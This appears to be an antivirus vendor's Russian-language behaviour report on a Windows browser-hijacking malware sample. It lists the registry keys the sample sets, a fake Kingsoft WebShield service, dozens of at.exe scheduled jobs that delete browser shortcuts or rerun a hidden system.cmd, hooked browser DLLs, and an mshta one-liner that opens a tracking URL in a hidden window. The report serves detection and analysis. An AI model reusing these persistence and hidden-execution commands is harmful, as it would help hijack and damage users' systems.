Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKLM>\Software\Classes\.NomPc\shell\open\command] '' = 'IEXPLORE.EXE http://www.4555.net/?newie'
- [<HKLM>\Software\Classes\.NomTb\shell\open\command] '' = 'IEXPLORE.EXE http://www.11zuiduan.com/go/4555/taobao.html'
Создает или изменяет следующие файлы
- %WINDIR%\tasks\at1.job
- <SYSTEM32>\tasks\at47
- %WINDIR%\tasks\at48.job
- <SYSTEM32>\tasks\at48
- %WINDIR%\tasks\at49.job
- <SYSTEM32>\tasks\at49
- %WINDIR%\tasks\at54.job
- %WINDIR%\tasks\at47.job
- <SYSTEM32>\tasks\at46
- <SYSTEM32>\tasks\at51
- %WINDIR%\tasks\at52.job
- <SYSTEM32>\tasks\at52
- %WINDIR%\tasks\at53.job
- <SYSTEM32>\tasks\at53
- %WINDIR%\tasks\at50.job
- %WINDIR%\tasks\at51.job
- <SYSTEM32>\tasks\at37
- <SYSTEM32>\tasks\at50
- <SYSTEM32>\tasks\at41
- <SYSTEM32>\tasks\at38
- %WINDIR%\tasks\at39.job
- <SYSTEM32>\tasks\at39
- %WINDIR%\tasks\at40.job
- <SYSTEM32>\tasks\at40
- %WINDIR%\tasks\at45.job
- %WINDIR%\tasks\at46.job
- <SYSTEM32>\tasks\at45
- <SYSTEM32>\tasks\at42
- %WINDIR%\tasks\at43.job
- <SYSTEM32>\tasks\at43
- %WINDIR%\tasks\at44.job
- <SYSTEM32>\tasks\at44
- %WINDIR%\tasks\at41.job
- %WINDIR%\tasks\at42.job
- %WINDIR%\tasks\at38.job
- <SYSTEM32>\tasks\at54
- <SYSTEM32>\tasks\at56
- <SYSTEM32>\tasks\at65
- %WINDIR%\tasks\at66.job
- <SYSTEM32>\tasks\at66
- %WINDIR%\tasks\at67.job
- <SYSTEM32>\tasks\at67
- <SYSTEM32>\tasks\at64
- %WINDIR%\tasks\at65.job
- %WINDIR%\tasks\at68.job
- <SYSTEM32>\tasks\at69
- %WINDIR%\tasks\at70.job
- <SYSTEM32>\tasks\at70
- %WINDIR%\tasks\at71.job
- <SYSTEM32>\tasks\at71
- <SYSTEM32>\tasks\at68
- %WINDIR%\tasks\at69.job
- <SYSTEM32>\tasks\at55
- %WINDIR%\tasks\at55.job
- %WINDIR%\tasks\at63.job
- %WINDIR%\tasks\at57.job
- <SYSTEM32>\tasks\at57
- %WINDIR%\tasks\at58.job
- <SYSTEM32>\tasks\at58
- <SYSTEM32>\tasks\at63
- %WINDIR%\tasks\at56.job
- %WINDIR%\tasks\at64.job
- %WINDIR%\tasks\at59.job
- %WINDIR%\tasks\at61.job
- <SYSTEM32>\tasks\at61
- %WINDIR%\tasks\at62.job
- <SYSTEM32>\tasks\at62
- <SYSTEM32>\tasks\at59
- %WINDIR%\tasks\at60.job
- <SYSTEM32>\tasks\at60
- %WINDIR%\tasks\at37.job
- <SYSTEM32>\tasks\at36
- %WINDIR%\tasks\at36.job
- %WINDIR%\tasks\at11.job
- <SYSTEM32>\tasks\at11
- %WINDIR%\tasks\at12.job
- <SYSTEM32>\tasks\at12
- %WINDIR%\tasks\at13.job
- %WINDIR%\tasks\at10.job
- <SYSTEM32>\tasks\at17
- <SYSTEM32>\tasks\at9
- %WINDIR%\tasks\at15.job
- <SYSTEM32>\tasks\at15
- %WINDIR%\tasks\at16.job
- <SYSTEM32>\tasks\at16
- %WINDIR%\tasks\at17.job
- %WINDIR%\tasks\at14.job
- <SYSTEM32>\tasks\at13
- <SYSTEM32>\tasks\at14
- <SYSTEM32>\tasks\at8
- <SYSTEM32>\tasks\at5
- %WINDIR%\tasks\at2.job
- <SYSTEM32>\tasks\at2
- %WINDIR%\tasks\at3.job
- <SYSTEM32>\tasks\at3
- %WINDIR%\tasks\at4.job
- %WINDIR%\tasks\at9.job
- %WINDIR%\tasks\at18.job
- <SYSTEM32>\tasks\at1
- %WINDIR%\tasks\at6.job
- <SYSTEM32>\tasks\at6
- %WINDIR%\tasks\at7.job
- <SYSTEM32>\tasks\at7
- %WINDIR%\tasks\at8.job
- %WINDIR%\tasks\at5.job
- <SYSTEM32>\tasks\at4
- <SYSTEM32>\tasks\at10
- <SYSTEM32>\tasks\at18
- %WINDIR%\tasks\at29.job
- %WINDIR%\tasks\at30.job
- <SYSTEM32>\tasks\at30
- %WINDIR%\tasks\at31.job
- <SYSTEM32>\tasks\at31
- <SYSTEM32>\tasks\at28
- <SYSTEM32>\tasks\at27
- <SYSTEM32>\tasks\at29
- %WINDIR%\tasks\at32.job
- %WINDIR%\tasks\at34.job
- <SYSTEM32>\tasks\at34
- %WINDIR%\tasks\at35.job
- <SYSTEM32>\tasks\at35
- <SYSTEM32>\tasks\at32
- %WINDIR%\tasks\at33.job
- <SYSTEM32>\tasks\at33
- %WINDIR%\tasks\at28.job
- %WINDIR%\tasks\at27.job
- %WINDIR%\tasks\at19.job
- %WINDIR%\tasks\at20.job
- <SYSTEM32>\tasks\at20
- %WINDIR%\tasks\at21.job
- <SYSTEM32>\tasks\at21
- %WINDIR%\tasks\at22.job
- <SYSTEM32>\tasks\at22
- <SYSTEM32>\tasks\at19
- %WINDIR%\tasks\at23.job
- %WINDIR%\tasks\at24.job
- <SYSTEM32>\tasks\at24
- %WINDIR%\tasks\at25.job
- <SYSTEM32>\tasks\at25
- %WINDIR%\tasks\at26.job
- <SYSTEM32>\tasks\at26
- <SYSTEM32>\tasks\at23
- %WINDIR%\tasks\at72.job
- <SYSTEM32>\tasks\at72
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\Kingsoft Antivirus WebShield Service] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\Kingsoft Antivirus WebShield Service] 'ImagePath' = 'C:\Documents and Settings\All Users\Application Data\Microsoft\huacai\wd\KSWebShield.exe'
Создает следующие сервисы
- 'Kingsoft Antivirus WebShield Service' C:\Documents and Settings\All Users\Application Data\Microsoft\huacai\wd\KSWebShield.exe
Вредоносные функции
Запускает на исполнение
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://t.###666.com/info.mssql/?st#########
- '%WINDIR%\syswow64\at.exe' 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"
- '%WINDIR%\syswow64\at.exe' 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"
- '%WINDIR%\syswow64\at.exe' 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"
- '%WINDIR%\syswow64\at.exe' 13:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"
- '%WINDIR%\syswow64\at.exe' 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"
- '%WINDIR%\syswow64\at.exe' 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"
- '%WINDIR%\syswow64\at.exe' 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%ALLUSERSPROFILE%\╫└├Вµ\*└└*.*"
- '%WINDIR%\syswow64\at.exe' 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\╫└├Вµ\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 23:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 09:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 08:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 07:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 05:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 02:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 22:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 00:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 21:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 20:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 19:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 18:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 17:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 16:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 15:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"
- '%WINDIR%\syswow64\at.exe' 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "%HOMEPATH%\Application Data\Microsoft\Internet Explorer\Quick Launch\*xplore*.*"
- '%WINDIR%\syswow64\at.exe' 12:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 11:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 10:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 09:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 08:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 07:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 05:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 02:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\at.exe' 14:01 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday "%CommonProgramFiles%\System\ado\system.cmd"
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://www.45##.net/index2.html?hu####
Перехватывает функции
в браузерах
- Процесс firefox.exe, модуль wininet.dll
- Процесс iexplore.exe, модуль urlmon.dll
- Процесс firefox.exe, модуль urlmon.dll
- Процесс iexplore.exe, модуль advapi32.dll
- Процесс iexplore.exe, модуль wininet.dll
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\~c706.bat
- C:\documents and settings\all users\application data\microsoft\huacai\wd\kswebshield.exe
- C:\documents and settings\all users\application data\kingsoft\kws\kws.ini
- C:\documents and settings\all users\application data\microsoft\huacai\wd\kwssvc.log
- %ProgramFiles%\internet explorer\tbgw.ico
- %ProgramFiles%\winzp\tbgw.ico
- %ProgramFiles%\winzp\fav.cmd
- %ProgramFiles%\winzp\dsu.reg
- %ProgramFiles%\winzp\mypc.vbs
- %ProgramFiles%\winzp\361.cmd
- %LOCALAPPDATA%\kwssp.dll
- %ProgramFiles%\winzp\system.cmd
- %ProgramFiles%\winzp\tb.cmd
- %ProgramFiles%\winsoftware..\tbgw.ico
- %ProgramFiles%\winsoftware..\dsu.reg
- %ProgramFiles%\winsoftware..\mypc.vbs
- %ProgramFiles%\winsoftware..\361.cmd
- %ProgramFiles%\winsoftware..\system.cmd
- %ProgramFiles%\winsoftware..\tool.cmd
- %ProgramFiles%\winsoftware..\tb.cmd
- %HOMEPATH%\applic~1\microsoft\intern~1\quick launch\internet expleror.nompc
- C:\documents and settings\all users\application data\microsoft\huacai\wd\kswbc.dll
- C:\documents and settings\all users\application data\microsoft\huacai\wd\kwsui.dll
- C:\documents and settings\all users\application data\microsoft\huacai\wd\kwssp.dll
- C:\documents and settings\all users\application data\microsoft\huacai\wd\kswebshield.dll
- %LOCALAPPDATA%\tool.cmd
- %LOCALAPPDATA%\baidu.lnh
- %LOCALAPPDATA%\dns.cmd
- %LOCALAPPDATA%\dsu.reg
- %LOCALAPPDATA%\fav.cmd
- %LOCALAPPDATA%\ie.reg
- %LOCALAPPDATA%\in.exe
- %LOCALAPPDATA%\kswbc.dll
- %LOCALAPPDATA%\kswebshield.dll
- %LOCALAPPDATA%\kswebshield.exe
- %HOMEPATH%\favorites\╠╘▒ВЄ═В° - ╠╘ГєГ╬╥╧▓╗╢.nomtb
- %ProgramFiles%\winzp\tool.cmd
- %LOCALAPPDATA%\kws.ini
- %LOCALAPPDATA%\lnh.reg
- %LOCALAPPDATA%\mypc.lnh
- %LOCALAPPDATA%\mypc.vbs
- %LOCALAPPDATA%\pc36.reg
- %LOCALAPPDATA%\pc36d.reg
- %LOCALAPPDATA%\system.cmd
- %LOCALAPPDATA%\tb.cmd
- %LOCALAPPDATA%\tb.reg
- %LOCALAPPDATA%\tbgw.ico
- %LOCALAPPDATA%\361.cmd
- %LOCALAPPDATA%\kwsui.dll
- %HOMEPATH%\favorites\═В°╓╖╡╝║╜╒╛.nompc
Присваивает атрибут 'скрытый' для следующих файлов
- %TEMP%\~c706.bat
- C:\documents and settings\all users\application data\kingsoft\kws\kws.ini
Сетевая активность
UDP
- DNS ASK t.###666.com
Другое
Ищет следующие окна
- ClassName: 'kws::OSUCWindowClass' WindowName: ''
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- ClassName: 'WorkerW' WindowName: ''
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'Address Band Root' WindowName: ''
- ClassName: 'ComboBoxEx32' WindowName: ''
- ClassName: 'Static' WindowName: ''
Создает и запускает на исполнение
- 'C:\documents and settings\all users\application data\microsoft\huacai\wd\kswebshield.exe' -install
- 'C:\documents and settings\all users\application data\microsoft\huacai\wd\kswebshield.exe' -start
- 'C:\documents and settings\all users\application data\microsoft\huacai\wd\kswebshield.exe'
- 'C:\documents and settings\all users\application data\microsoft\huacai\wd\kswebshield.exe' -run
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\~C706.bat "<Полный путь к файлу>"' (со скрытым окном)
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://t.###666.com/info.mssql/?st#########' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\~C706.bat "<Полный путь к файлу>"
- '%WINDIR%\syswow64\attrib.exe' +r +h +s "C:\Documents and Settings\All Users\Application Data\kingsoft\kws\kws.ini"
- '%WINDIR%\syswow64\regedit.exe' /s "%LOCALAPPDATA%\lnh.reg"
- '%WINDIR%\syswow64\regedit.exe' /s "%LOCALAPPDATA%\IE.reg"
- '%WINDIR%\syswow64\regedit.exe' /s "%LOCALAPPDATA%\TB.reg"
- '%WINDIR%\syswow64\mshta.exe' vbscript:createobject("wscript.shell").run("""iexplore""http://t.###666.com/info.mssql/?st#########",0)(window.close)
- '%WINDIR%\syswow64\sc.exe' config Schedule start= auto
- '%WINDIR%\syswow64\net.exe' start "Task Scheduler"
- '%WINDIR%\syswow64\net1.exe' start "Task Scheduler"
- '%WINDIR%\syswow64\attrib.exe' +r +h +s "%CommonProgramFiles%\System\ado\system.cmd"
- '%WINDIR%\syswow64\reg.exe' add HKEY_CLASSES_ROOT\VBSFile\DefaultIcon /v "" /t "REG_EXPAND_SZ" /d "<SYSTEM32>\mspaint.exe,0" /f
- '%WINDIR%\syswow64\wscript.exe' lnk.vbs
